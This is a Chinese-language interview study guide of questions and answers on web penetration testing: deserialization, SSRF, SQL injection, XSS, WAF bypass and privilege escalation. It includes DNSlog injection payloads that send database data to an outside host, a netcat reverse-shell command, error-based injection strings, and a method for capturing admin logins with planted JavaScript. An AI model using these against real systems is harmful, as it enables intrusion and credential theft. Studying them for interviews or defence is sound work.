《网络安全面试总结》--web白盒漏洞问题

网络安全面试题目

Web安全

web白盒漏洞问题

1.JAVA反序列化了解吗？有没有了解过shrio反序列化？

Java中的ObjectOutputStream类的writeObject()方法可以实现序列化，其作用把对象转换成字节流，便于保存或者传输，而ObjectInputStream类的readObject()方法用于反序列化，作用就是把字节流还原成对象。shiro反序列化主要是Apache shiro提供了一个remember的一个功能，用户登录成功后会生成经过加密并编码的cookie，保存在浏览器中方便用户的日常使用，而服务器对cookie的处理流程就是先获取浏览器上保存的cookie，然后将其bs64解码，再进行AES解密，再将其反序列化进行校验，而漏洞就是出现在这里，我们都知道AES它是一个硬编码，他是有默认密钥的，如果程序员没有去修改或者过于简单，那我们就可以进行cookie重构，先构造我们的恶意代码，然后将恶意代码进行序列化，然后AES加密(密钥我们已经爆破出来了)，再进行bs64编码，形成我们新的cookie，而服务器在处理时就会按照刚才的处理流程，就会在服务端触发我们构造的恶意代码。

2.PHP反序列化有了解吗？

序列化就是将一个对象转换成字符串，反序列化则反之，将字符串重新转化为对象。此外，PHP反序列化又可以简单分成两种，一种无类，一种有类，无类利用就略微简单，如果源码会将输入的值进行反序列化，那我们就需要提前将数据序列化后再传入。而想要利用有类就要用到魔术方法，而魔术方法就像一个潜规则一样，例如我们在创建对象时，就会触发 construct(),并执行 construct()中的代码。

3.fastjson漏洞利用原理？

在请求包里面中发送恶意的json格式payload，漏洞在处理json对象的时候，没有对@type字段进行过滤，从而导致攻击者可以传入恶意的TemplatesImpl类，而这个类有一个字段就是 _bytecodes ，有部分函数会根据这个 _bytecodes 生成java实例，这就达到fastjson通过字段传入一个类，再通过这个类被生成时执行构造函数。

4.PHP代码执行的危险函数？PHP命令执行函数？

• PHP 代码执行的危险函数：call_user_func()、call_user_func_array()、create_function()、array_map()

• PHP 命令执行函数：system()、shell_exec()、passthru()、exec()、popen()、proc_open()、putenv()

5.phar协议如何利用，php伪协议input与post数据包发送有什么区别？

• 可以Bypass一些waf，绕过上传限制
• Phar反序列化，Phar:// 伪协议读取phar文件时，会反序列化meta-data储存
• 区别
  • application/x-www-form-urlencoded 或multipart/form-data时，php://input 中是原始数据。 $_POST 中是关联数组，且没有上传控件的内容。
  • enctype="multipart/form-data" 时php://input 是无效的。
  • Content-Type = "text/plain"时，$_POST 不能获取post的数据，php://input可以。

** Fastjson、Log4j常见漏洞原理？如何彻底解决该漏洞？

• 思路：彻底解决该漏洞可以分析根因，Fastjson主要因为Autotype导致的、Log4j主要因为Lookup，可考虑移除经常出现问题的代码，制作内部精简定制版本。或者通过应用运行时防护（RASP）。

web组件端口漏洞问题

1.常见的中间件漏洞知道哪些？

• IIS：PUT漏洞、短文件名猜解、远程代码执行、解析漏洞等
• Apache：解析漏洞、目录遍历等
• Nginx:文件解析、目录遍历、CRLF注入、目录穿越等
• Tomcat:远程代码执行、war后门文件部署等
• JBoss:反序列化漏洞、war后门文件部署等
• WebLogic:反序列化漏洞、SSRF任意文件上传、war后门文件部署等

2.未授权访问你可以简单说说吗

• Redis 未授权访问漏洞

未开启认证，导致可以直接连接到数据库，然后在攻击机中生成ssh公钥和私钥，密码设置为空，然后将生成的公钥写入，再利用私钥连接。

• JBOSS 未授权访问漏洞

访问ip/jmx-console 就可以浏览jboss 的部署管理的信息面板，不需要输入用户名和密码可以直接部署上传木马。简单来说就是对某些页面的验证不严格导致绕过了用户验证的环节，使其可以直接访问到某些登录后才能访问到的页面。

3.weblogic权限绕过？

• 通过静态资源来绕过权限验证，防止被重定向到登陆界面。
• 通过请求.portal ，控制处理的Servlet 是渲染UI 的MBeanUtilsInitSingleFileServlet 。
• 通过编码后的.../ ，让最终渲染的模版是console.portal。

web基础实战问题

1.逻辑漏洞遇到过哪些，给你登录框有没有什么思路？

• 常见逻辑漏洞：越权，响应包修改，支付金额修改，cookie爆破，密码找回方面等等
• 登录页面思路：爆破，session覆盖，sql注入，xss，任意用户注册，js文件查看敏感信息，短信轰炸，万能密码，二次注入，模板注入等等

2.CDN和DNS区别？CDN绕过思路？

• CDN：内容分发网络，主要作用就是让用户就近访问网络资源，提高响应速度，降低网络拥堵。
• DNS:域名服务器，主要作用就是将域名翻译成ip地址。
• CDN绕过思路：子域名，内部邮件，黑暗引擎搜索，国外ping，证书及DNS查询，app抓包，配置不当泄露，扫全网，DOS攻击等。

3.命令无回显如何解决？

• 无回显：延时判断，http请求监听，DNSlog利用，写入当前目录下载查看等等。

4.3389端口无法连接的几种情况？

1.3389关闭状态

2.端口修改

3.防火墙连接

4.处于内网环境

5.超过了服务器最大连接数

6.管理员设置 权限，指定用户登录

5.常问的端口信息？

• 21：FTP文件传输协议
• 22：SSH远程连接
• 23:TELNET远程登录
• 25:SMTP邮件服务
• 53:DNS域名系统
• 80：HTTP超文本传输协议
• 443：HTTPS安全超文本传输协议
• 1433：MSSQL
• 3306：MYSQL
• 3389：windows远程桌面服务端口
• 7701：weblogic
• 8080：TCP,HTTP协议代理服务器：Apache-tomcat默认端口号

6.渗透测试的流程？

• 单一网站：先判断有无CDN，有先找真实ip，无的话扫扫旁站，c段，此外识别CMS，看看使用什么中间件，插件，系统等等，再对其进行端口探测，目录扫描，查看网站的js文件，看看有没有敏感信息泄露，找找看看有没有app，公众号之类的等等扩大资产面，然后对收集到的信息进行常规的漏洞探测
• 网段或区域：使用goby工具对资产进行一个批量的扫描，批量打点，然后对可能存在漏洞的薄弱点进行漏洞探测

7.打点一般会用什么漏洞？

优先以java反序列化这些漏洞像shiro，fastjson，weblogic，用友oa等等进行打点，随后再找其他脆弱性易打进去的点。因为javaweb程序运行都是以高权限有限运行，部分可能会降权。

8.SSRF禁用127.0.0.1后如何绕过，支持哪些协议？

(1) 利用进制转换

(2) 利用DNS解析

(3) 利用句号（127。0。0。1）

(4) 利用[::]（http://[::]:80/）；

(5) 利用@（http 😕/example.com@127.0.0.1）；

(6) 利用短地址（http 😕/dwz.cn/11SMa）；

(7) 协议（Dict://、SFTP://、TFTP://、LDAP://、Gopher://）

9.sqlmap自带脚本你知道哪些？

1、apostrophemask.py ：将引号替换为UTF-8,用于过滤单引号。

2、base64encode.py :替换为base64编码。

3、multiplespaces.py:围绕SQL关键字添加多个空格。

4、space2plus.py:用+号替换为空格。

10.了解过解析漏洞，分别有哪些？

• IIS：
  • 1、在网站目录.asp、.asa下的任何扩展名的文件格式都会被解析为asp并执行在目录.asp下，.txt文本文件被解析。
  • 2、在IIS6.0上，分号; 后面的不解析。
• nginx：
  • 1、在网站目录下创建文件demo2.jpg，然后再浏览器 中 访 问 http://192.168.11.131/test2/demo2.jpg/aaa.php服务器对请求的内容是从右向左的。Nginx拿到文件路径（更专业的说法是URI）/test.jpg/test.php后，一看后缀是.php，便认为该文件是php文件，转交给php去处理。php一看/test.jpg/test.php不存在，便删去最后的/test.php，又看/test.jpg存在，便把/test.jpg当成要执行的文件了，又因为后缀为.jpg，php认为这不是php文件，于是返回"Accessdenied."。
  • 2、00截断
• apache
  • Apache解析文件的时候是按照从右向左的方式，直到遇到自己能解析的脚本后缀

11.为何一个mysql数据库的站，只有一个80端口开放？

• 更改了端口，没有扫描出来。
• 站库分离。
• 3306端口不对外开放。

12.注入时可以不使用and或or或xor，直接order by开始注入吗？

and/or/xor，前面的1=1、1=2步骤只是为了判断是否为注入点，如果已经确定是注入点那就可以省那步骤去。

13.在有shell的情况下，如何使用xss实现对目标站的长久控制？

• 后台登录处加一段记录登录账号密码的js，并且判断是否登录成功，如果登录成功，就把账号密码记录到一个生僻的路径的文件中或者直接发到自己的网站文件中。(此方法适合有价值并且需要深入控制权限的网络)。
• 在登录后才可以访问的文件中插入XSS脚本。

14.目标站无防护，上传图片可以正常访问，上传脚本格式访问则403什么原因？

这种情况很可能是因为目标站点对上传文件进行了格式限制。在上传文件时，服务器通常会检测文件类型和内容，并根据不同的文件类型采取不同的处理方式。如果上传的文件类型不在允许范围内，服务器可能会禁止访问该文件，返回403状态码。可以尝试改写后缀进行绕过。

15.access扫出后缀为asp的数据库文件，访问乱码。如何实现到本地利用？

迅雷下载，直接改后缀为.mdb。

16.文件包含Getshell思路？

• 通过PHP伪协议php://input写入一句话木马
• 通过PHP伪协议php://filter读取敏感文件

17.xss的防护方法有哪些呢？httponly绕过？

• 防护
  • 输入过滤
  • 纯前端渲染
  • 转义HTML
• 绕过
  • CVE-2012-0053。
  • PHPINFO页面（如果目标网站存在PHPINFO页面，就可以通过XMLHttpRequest请求该页面获取Cookie信息（$_SERVER["HTTP_COOKIE"]会打印出具有httponly属性的cookies））。
  • iframe框架钓鱼（通过标签嵌入一个远程域，完全撑开后，以覆盖原有的页面）。跳转钓鱼（通过购买相似名，构建相同的钓鱼页面，使受害者跳转至钓鱼站）。
  • 历史密码（通过js伪造登录表单，欺骗浏览器自动填入，由此获取浏览器记住的历史密码）。

18.你常用的渗透工具or漏扫工具？

• 渗透工具：msf，cs，nmap，slqmap，dirscan，burp等
• 漏扫：xray,awvs,nessus,appscan等

19.sqlmap中--os-shell的原理及利用条件？

• 利用条件：root权限，知道绝对路径，GPC关闭，Secure_file_priv参数为空或者为指定路径。
• 原理及流程：原理其他比较简单，先目标的一个基础信息的探测，然后上传shell到目标web网站上，利用shell传参进行命令执行，退出时删除shell。
• 当然数据库不同，必要条件也不同，例如sqlserver需要数据库支持外连，数据库权限为SA权限，主要利用xp_cmdshell扩展进行命令执行。
• 原理细致分析：https://xz.aliyun.com/t/7942#toc-4

20.对于信息收集你会使用哪些工具？具体用来干什么？

• nmap：端口服务扫描，常见漏洞探测
• dirsearch：目录信息扫描
• whatwaf：waf检测识别
• WFuzz：fuzz测试
• 潮汐指纹识别orwappalzer：cms及中间件等信息收集

21.市面上的几款webshell管理工具，他们的相同点和不同点？

• 相同点：都是webshell管理的工具，都采用的是C/S模型，上传的shell为S，个人客户端为C。
• 不同点：实现区别，功能差异，例如冰蝎有流量动态加密。

22.nmap常用参数，说一下？

参考文章：https://www.cnblogs.com/Vinson404/p/7784829.htm

23.如何手工判断对方操作系统？

• 修改url中参数，改成大写，正常为windows，不正常即为linux
• ping服务器，返还得TTL值不一样，windows一般在100以上，linux一般是100以下。
• 查看数据包HTTP报头，如果是iis那就肯定是windows

24.Linux日志目录？

• /var/log下

25.php的%00截断的原理是什么？

• 因为在C语言中字符串的结束标识符%00是结束符号，而PHP就是C写的，所以继承了C的特性，所以判断为%00是结束符号不会继续往后执行
• 条件：PHP<5.3.29，且GPC关闭。

26.php的LFI，本地包含漏洞原理是什么？写一段带有漏洞的代码。手工的话如何发掘？如果无报错回显，你是怎么遍历文件的？

if ($_GET['file']){
    include $_GET['file'];
}

• 包含的文件设置为变量，并且无过滤导致可以调用恶意文件 还可以对远程文件包含，但需要开启allow_url_include = ON 通过测试参数的地方进行本地文件/etc/passwd等包含 如何存在漏洞而且没有回显，有可能没有显示在页面而是在网页源代码中，除些可以利用DNSlog进行获取包含的信息。从index.php文件一级级往读取 也可以利用PHP封装协议读取文件

27.sleep被禁用后还能怎么进行sql注入

• BENCHMARK，Get_lock函数，当都被禁用后可以用计算量比较大的语句使数据库查询时间变长，从而达到延时注入的效果。 mysql：AND (SELECT count(*) FROM information_schema.columns A, information_schema.columns B, information_schema.SCHEMATA C);

28.XXE的危害？哪些地方容易存在xxe？xxe架构方面有没有了解过

• xxe常见场景是如pdf在线解析、word在线解析、定制协议，留言板等，跟逻辑设计有关而与语言无关，最好是不要让XML作为参数传输或整体结构可被用户篡改。如果一定要使用，至少要禁用DTD、Entity。 xxe危害 读取本地文件，执行系统命令，探测内网端口，攻击内网服务 探测内网端口的协议有gopher file dict，不同语言支持不同的协议，是具体情况而定 file http ftp是常用的
• 防范，python用lxml时可以对resolve_entities设为false。或者过滤用户提交的xml
• 客户端也可以有xxe攻击，有的网站会使用office打开docx进行解析 Java解析XML的常用三方库，如果不禁用DTD、Entity都会导致XXE漏洞：javax.xml.stream.XMLStreamReader;javax.xml.parsers.DocumentBuilderFactory;

29.信息收集如何处理子域名爆破的泛解析问题？

• 参考文章：https://blog.csdn.net/Chu_Jian_Xiong/article/details/127496889

30.输出到href的XSS如何防御？

• 参考文章：https://blog.csdn.net/m0_53008479/article/details/124487401

31.samesite防御CSRF的原理？

• 参考文章：https://blog.csdn.net/qq_26192391/article/details/116378150

32.phpmyadmin写sehll的方法？

• 常规导入shell的操作
• 一句话导出shell
• 日志备份获取shell

33.Sql注入无回显的情况下，利用DNSlog，mysql下利用什么构造代码？mssql下又如何？

• 没有回显的情况下，一般编写脚本，进行自动化注入。但与此同时，由于防火墙的存在，容易被封禁IP，可以尝试调整请求频率，有条件的使用代理池进行请求。
• 此时也可以使用DNSlog 注入，原理就是把服务器返回的结果放在域名中，然后读取DNS 解析时的日志，来获取想要的信息。
• Mysql 中利用load_file() 构造payload： ' and if((select load_file(concat('\',(selectdatabase()),'.xxx.cey e.io\abc'))),1,0)#
• Mssql 下利用master...xp_dirtree 构造payload：DECLARE @ hostvarchar(1024);SELECT @ host=(SELECTdb_name())+'.xxx.ceye.io';EXEC('master...xp_dirtree"'+@host+'\foobar$"');

34.宽字节注入漏洞原理、利用方式及修复方案？

• 原理：在mysql中使用了gbk编码，占用2个字节,而mysql的一种特性,GBK是多字节编码，它认为两个字节就代表一个汉字，所以%df时候会和转义符\ %5c进行结合,所以单引号就逃逸了出来,当第一个字节的ascii码大于128，就可以了。

• 参考文章：

  https://blog.csdn.net/weixin_41489908/article/details/108481665

  https://www.cnblogs.com/zzjdbk/p/12984498.html

35.平常怎么去发现shiro漏洞的？

• 思路：登陆失败时候会返回rememberMe=deleteMe字段或者使用shiroScan被动扫描去发现
• 完整：未登陆的情况下，请求包的cookie中没有rememberMe字段，返回包setCookie里也没有deleteMe字段登陆失败的话，不管勾选RememberMe字段没有，返回包都会有rememberMe=deleteMe字段不勾选RememberMe字段，登陆成功的话，返回包set-Cookie会有rememberMe=deleteMe字段。但是之后的所有请求中Cookie都不会有rememberMe字段勾选RememberMe字段，登陆成功的话，返回包set-Cookie会有rememberMe=deleteMe字段，还会有rememberMe字段，之后的所有请求中Cookie都会有rememberMe字段。

36.拿到webshell不出网情况下怎么办？

• reg上传去正向连接。探测出网协议，如dns，icmp。

37.phpmyadmin写sehll的方法？

• 常规导入shell的操作
• 一句话导出shell
• 日志备份获取shell

38.ssrf怎么用redis写shell？

• SSRF服务端请求伪造：
  • 对内网扫描，获取banner
  • 攻击运行在内网的应用，主要是使用GET参数就可以实现的攻击（比如Struts2，sqli 等）。
  • 利用协议读取本地文件。
  • 云计算环境AWS Google Cloud 环境可以调用内网操作ECS 的 API。
• webligic SSRF漏洞：通过SSRF的gopher协议操作内网的redis，利用redis将反弹shell写入crontab定时任务，url编码，将\r字符串替换成%0d%0a。

39.SVN/GIT源代码泄露？

• SVN原理：
  在使用SVN管理本地代码过程中，会自动生成一个名为.svn的隐藏文件夹，其中包含重要的源代码信息：
• SVN修复方式：
  查找服务器上所有 .svn 隐藏文件夹，删除。开发人员在使用 SVN 时，严格使用导出功能。禁止直接复制代码。
• GIT原理：
  使用git进行版本控制，对站点自动部署。如果配置不当，可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。
• GIT修复方式：
  查找服务器上所有 .git 隐藏文件夹，删除。中间件上设置 .git 目录访问权限，禁止访问。

40.提权你了解过吗？udf提取原理是什么

• 将udf文件放到指定位置（Mysql>5.1放在Mysql根目录的lib\plugin文件夹下）
• 从udf文件中引入自定义函数(user defined function)
• 执行自定义函数
• 完整：MySQL和PostgreSQL等数据库软件中允许用户自定义函数，并使用这些自定义函数进行查询。由于UDF函数可以动态加载，这就为攻击者提供了一种途径，即将恶意代码编写成UDF形式并上传到数据库，然后通过SQL注入等手段触发该函数，从而获得系统管理员权限。

41.反弹 shell 的常用命令？一般常反弹哪一种 shell？为什么？

• nc -lvvp 7777 -e /bin/bash
• bash是交互式,否则像useradd无法执行交互

42.如何手工判断对方操作系统？

• 修改url中参数，改成大写，正常为windows，不正常即为linux
• ping服务器，返还得TTL值不一样，windows一般在100以上，linux一般是100以下。
• 查看数据包HTTP报头，如果是iis那就肯定是windows

43.DDos攻击

客户端向服务端发送请求链接数据包，服务端向客户端发送确认数据包，客户端不向服务端发送确认数据包，服务器一直等待来自客户端的确认

没有彻底根治的办法，除非不使用TCP

DDos预防：

（1）限制同时打开SYN半链接的数目

（2）缩短SYN半链接的Time out 时间

（3）关闭不必要的服务

44.找到一个注入点怎么判断对方什么数据库？

常见的数据库Oracle、MySQL、SQL Server、Access、MSsql、mongodb等

关系型数据库：由二维表及其之间的联系组成的一个数据组织。如：Oracle、DB2、MySql

• 可以使用特定的函数来判断，该数据库特有的。
  • len()函数：mssql、mysql、db2
  • length()函数:Oracle、informix
  • substring：mssql
  • substr：oracle
  • version()>1 返回与@@version>1 相同页面时，则可能是mysql。如果出现提示version()错误时，则可能是mssql。
• 可以使用辅助的符号来判断，如注释符号、多语句查询符等等。
  • /* mysql特有注释符，返回错误说明不是mysql
  • -- 是Oracle和MSSQL支持的注释符，如果返回正常，则说明为这两种数据库类型之一。继续提交如下查询字符
  • ; 是子句查询标识符，Oracle不支持多行查询，因此如果返回错误，则说明很可能是Oracle数据库。
• 可以利用错误信息
  • 错误信息中包含了"MySQL"和"server version"等关键词，这表明该目标系统可能是MySQL数据库。
  • 错误信息中包含了"quotation mark"等关键词，这表明该目标系统可能是MSSQL数据库。
  • 错误信息中包含了"Syntax error"等关键词，这表明该目标系统可能是ACCESS数据库
• 是否存在数据库某些特性辅助判断
  • and exists (select count(*) from sysobjects) 返回正常是mssql
  • and exists (select count(*) from msysobjects) 两条，和上一条返回都不正常是ACCESS，如果是字符型，参数后加 ' 最后加 ;--

45.报错注入的函数有哪些？10个

（1）and extractvalue(1, concat(0x7e,(select @@version),0x7e))

（2）通过floor报错 向下取整

（3）and updatexml(1, concat(0x7e,(secect @@version),0x7e),1)

（4）select from test where id=1 and geometrycollection((select from(selectfrom(select user())a)b));

（5）select from test where id=1 and multipoint((select from(select from(select user())a)b));

（6）select from test where id=1 and polygon((select from(select from(select user())a)b));

（7）select from test where id=1 and multipolygon((select from(select from(select user())a)b));

（8）select from test where id=1 and linestring((select from(select from(select user())a)b));

（9）select from test where id=1 and multilinestring((select from(select from(select user())a)b));

（10）select from test where id=1 and exp(~(select * from(select user())a));

46.为什么参数化查询可以防止sql注入？

使用参数化查询数据库服务器不会把参数的内容当作sql指令的一部分来执行，是在数据库完成sql指令的编译后才套用参数运行

简单的说: 参数化能防注入的原因在于,语句是语句，参数是参数，参数的值并不是语句的一部分，数据库只按语句的语义跑

47.SQL注入单引号被过滤怎么办？

• 采用URL编码进行绕过 ' --> %27

48.SQL注入逗号被过滤了怎么办？

• 存在联合注入用join代替逗号
• 存在盲注，使用substring函数和ascii函数

49.Mysql一个@和两个@什么区别？

一个@是用户自定义变量 两个@是系统变量，如@@version、@@user

50.json格式的CSRF如何防御?

• 启用CSRF令牌

{

"name": "John",

"age": 30,

"csrf_token": "random_string_here"

}

• 使用SameSite Cookie
  • 具体实现方式可以在每个JSON请求中添加一个带有SameSite属性的Cookie，如下所示。
    • Cookie: session_id=random_string_here; SameSite=Strict

51.过滤limit后的逗号如何绕过?

• 采用OFFSET参数
  • SELECT * FROM tb_brand LIMIT 2 OFFSET 1 --> 从1开始取两条数据

52.在渗透过程中，收集目标站注册人邮箱对我们有什么价值？

(1)丢社工库里看看有没有泄露密码，然后尝试用泄露的密码进行登录后台

(2)用邮箱做关键词进行丢进搜索引擎

(3)利用搜索到的关联信息找出其他邮箱进而得到常用社交账号

(4)社工找出社交账号，里面或许会找出管理员设置密码的习惯

(5)利用已有信息生成专用字典

(6)观察管理员常逛哪些非大众性网站，拿下它，你会得到更多好东西

53.目前已知哪些版本的容器有解析漏洞，具体举例

1、IIS 6.0

/xx.asp/xx.jpg "xx.asp"是文件夹名

2、IIS 7.0/7.5

默认 Fast-CGI 开启，直接在 url 中图片地址后面输入/1.php，会把正常图片当成 php 解析

3、Nginx

版本小于等于 0.8.37，利用方法和 IIS 7.0/7.5 一样，Fast-CGI 关闭情况下也可利用。空字节代码

xxx.jpg.php

4、Apache

上传的文件命名为：test.php.x1.x2.x3，Apache 是从右往左判断后缀

54.如何突破注入时字符被转义？**

• 宽字符注入
• hex 编码绕过

55.提权时选择可读写目录，为何尽量不用带空格的目录？

因为 exp 执行多半需要空格界定参数

web bypass waf问题

1.WAF绕过的手法你知道哪些？

这里从以sql注入为例，从三个层面简单总结一下手法。

1.从架构层面：找到服务器真实IP，同网段绕过，http和https同时开放服务绕过，边缘资产漏洞利用绕过。

2.从协议层面：分块延时传输，利用pipline绕过，利用协议未覆盖绕过，POST及GET提交绕过。

3.从规则层面：编码绕过，等价符号替换绕过，普通注释和内敛注释，缓冲区溢出，mysql黑魔法，白名单及静态资源绕过，文件格式绕过，参数污染。

2.文件上传绕过WAF思路？

参考文章：https://cloud.tencent.com/developer/beta/article/1944142